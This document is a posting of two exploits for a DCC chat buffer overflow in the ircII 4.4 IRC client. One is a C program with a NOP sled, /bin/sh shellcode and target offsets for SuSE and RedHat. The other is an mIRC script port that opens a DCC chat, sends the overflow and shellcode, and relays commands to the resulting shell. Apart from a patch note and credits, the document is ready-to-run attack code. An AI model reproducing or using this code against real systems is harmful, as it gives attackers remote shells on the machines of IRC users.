The following exploits are for IrcII4.4. A dcc chat buffer overflow, one is for linux and the other one is for mirc. -- start irciisploit.txt -- /* ircii-4.4 exploit by bladi & aLmUDeNa buffer overflow in ircii dcc chat's allow to excute arbitrary Affected: ircII-4.4 Patch: Upgrade to ircII-4.4M ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz Offset: SuSe 6.x :0xbfffe3ff RedHat :0xbfffe888 Thanks to : #warinhell,#hacker_novatos Special thanks go to: Topo[lb], Saludos para todos los que nos conozcan especialmente para eva ;) (bladi@euskalnet.net) */ #include #include #include #include #include #include #include #include char *h_to_ip(char *hostname); char *h_to_ip(char *hostname) { struct hostent *hozt; struct sockaddr_in tmp; struct in_addr in; if ((hozt=gethostbyname(hostname))==NULL) { printf(" ERROR: IP incorrecta\n"); exit(0); } memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length); memcpy(&in,&tmp.sin_addr.s_addr,4); return(inet_ntoa(in)); } main(int argc, char *argv[]) { struct sockaddr_in sin; char *hostname; char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char *shell = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int outsocket,tnt,i; printf (" irciismash ver: 1.0\n"); printf (" by \n"); printf (" bladi & aLmUDeNa\n\n"); if (argc<3) { printf("Usage : %s hostname port\n",argv[0]); exit(-1); } hostname=argv[1]; outsocket=socket(AF_INET,SOCK_STREAM,0); sin.sin_family=AF_INET; sin.sin_port=htons(atoi(argv[2])); sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname)); if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) { printf(" ERROR: El puerto esta cerradito :_(\n"); exit(0); } printf("[1]- Noping\n ["); for(i=0;i<47;i++) { if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); } write(outsocket,nops,strlen(nops)); } printf("]\n"); printf(" Noped\n"); printf("[2]- Injectin shellcode\n"); write(outsocket,shell,strlen(shell)); usleep(999); printf(" Injected\n"); printf("[3]- Waiting\n ["); for(i=0;i<299;i++) { printf("."); fflush(stdout); usleep(99); write(outsocket,"\xff",strlen("\xff")); write(outsocket,"\xbf",strlen("\xff")); write(outsocket,"\xff",strlen("\xe9")); write(outsocket,"\xe3",strlen("\xff")); } printf("]\n[4]- Xploit \n - --(DoNe)-- -\n"); close(outsocket); } -- end irciisploit.txt -- -- start ide_expl.mrc -- # Wrote directly from irciisploit.txt(a .c program for *nix), that someone gave me to port to mirc. # # Exploit to overflow a buffer and run a shell. Although, more often than not it will crash/seg fault # with both versions of this exploit, by default. (exploit noted as being for V4.4, and patched in # V4.4M) # # irciisploit.txt by: bladi & aLmUDeNa # irciisploit.mrc(this) by: _v9(vade79) # # Also included in the exploit(irciisploit.txt) were some other offsets: # # "SuSe 6.x :0xbfffe3ff" # "RedHat :0xbfffe888" # # To load this script into mIRC5.7: /load -rs # # NOTE: While making this i noticed /sockwrite had some problems catching up on checking to see if # the connection still exists, so if you see a /sockwrite error in the status window, the user # probably seg faulted. alias -l bin { if ($len($1) != 2) { return } var %i, %j, %k if ($left($1,1) !isnum) { %i = $calc($asc($left($1,1)) -87)) } else { %i = $left($1,1) } if ($right($1,1) !isnum) { %j = $calc($asc($right($1,1)) -87)) } else { %j = $right($1,1) } while (%i) { %k = %k + 16 | dec %i } return $calc(%k + %j) } alias -l make_string { var %i = 1, %j while ($gettok($replace($1,\x,\),0,92) >= %i) { %j = %j $bin($gettok($replace($1,\x,\),%i,92)) inc %i } return %j } alias -l wn return @ircii4.4_dcc_exploit alias -l sw { if ($2) { if ($sock(exp_ide).status != active) { if ($window($wn)) { window -c $wn } echo -a Connection lost/non-existant. ( $+ %ide.status $+ ) } else { if ($window($wn)) { titlebar $wn $chr(91) data sent to socket(last): $1- $chr(93) } sockwrite $1- } } } alias -l main { if ($window($wn)) { window -c $wn } | window -aek $wn echo $wn *** [01]: sending DCC chat request, waiting... set %ide.nick $1 | set %ide.port $rand(1024,4096) while ($portfree(%ide.port) != $true) { set %ide.port $rand(1024,4096) } sockclose exp_ide_base | socklisten exp_ide_base %ide.port .quote privmsg $1 : $+ $chr(1) $+ DCC CHAT chat $longip($ip) %ide.port $+ $chr(1) } alias exploit_ircii { if ($server) { if ($window($wn)) { echo -a *** Close the exploit window before attempting to exploit. | halt } elseif ($version < 5.7) { echo -a *** Functions in this script require mIRC5.7 or greater. (aborted) | halt } elseif ($1) { main $1 } else { echo -a Syntax: /exploit_ircii } } } on 1:SOCKREAD:exp_ide: { if ($sockerr > 0) return :read sockread %data if ($sockbr == 0) return if (%data == $null) var %data = (no data) if ($window($wn)) { echo $wn -> %data } goto read } on 1:SOCKLISTEN:exp_ide_base: { sockclose exp_ide | sockaccept exp_ide | sockclose exp_ide_base unset %ide.status if ($window($wn)) { set %ide.status 0 echo $wn *** [02]: connected, setting up binary variables. (nops/shell code/etc) bset &nops 1 $make_string(\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90) bset &o 1 $make_string(\xff\xbf\xff\xe3) bset &shellcode 1 $make_string(\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff) bset -t &shellcode $calc($bvar(&shellcode,0) +1) /bin/sh echo $wn *** [03]: attempting to overflow buffer, sending the variables. (nops/shell code/etc) inc %ide.status echo $wn *** [--]: * (1/4) sending the nops, looping 47 times. var %i = 0 while (%i < 47) { sw exp_ide &nops inc %i } inc %ide.status echo $wn *** [--]: * (2/4) sent, now sending the shell code. sw exp_ide &shellcode %i = 0 | while (%i < 9999) { inc %i } inc %ide.status echo $wn *** [--]: * (3/4) sent, now waiting/continuing, looping 299 times. %i = 0 while (%i < 299) { var %j = 0 | while (%j < 499) { inc %j } var %j = 1 while ($bvar(&o,%j)) { bset &bit 1 $bvar(&o,%j) sw exp_ide &bit inc %j } inc %i } inc %ide.status echo $wn *** [--]: * (4/4) sent, done. } else { sockclose exp_ide } } on 1:SOCKCLOSE:exp_ide: { if ($window($wn)) { window -c $wn } echo -a *** Connection lost with %ide.nick $+ . ( $+ %ide.status $+ ) unset %ide.* } on 1:CLOSE:@: { if ($target == $wn) { if ($sock(exp_ide)) { sockclose exp_ide } if ($sock(exp_ide_base)) { sockclose exp_ide_base } unset %ide.* } } on 1:INPUT:@: { if ($active == $wn) { if ($sock(exp_ide).status == active) { if (%ide.status != 4) { echo *** Error, status is not at 4 yet, wait for completion. } else { echo $wn <- $1- | sw -n exp_ide $1- } } else { echo $wn *** Error, socket status isn't online yet. } halt } } on 1:LOAD: { if ($version < 5.7) { echo -a *** Functions in this script( $+ $nopath($script) $+ ) require mIRC5.7 or greater. (aborted) | .unload -rs $script | halt } else { echo -a *** Loaded $nopath($script) $+ , syntax is: /exploit_ircii . } } -- end ide_expl.mrc --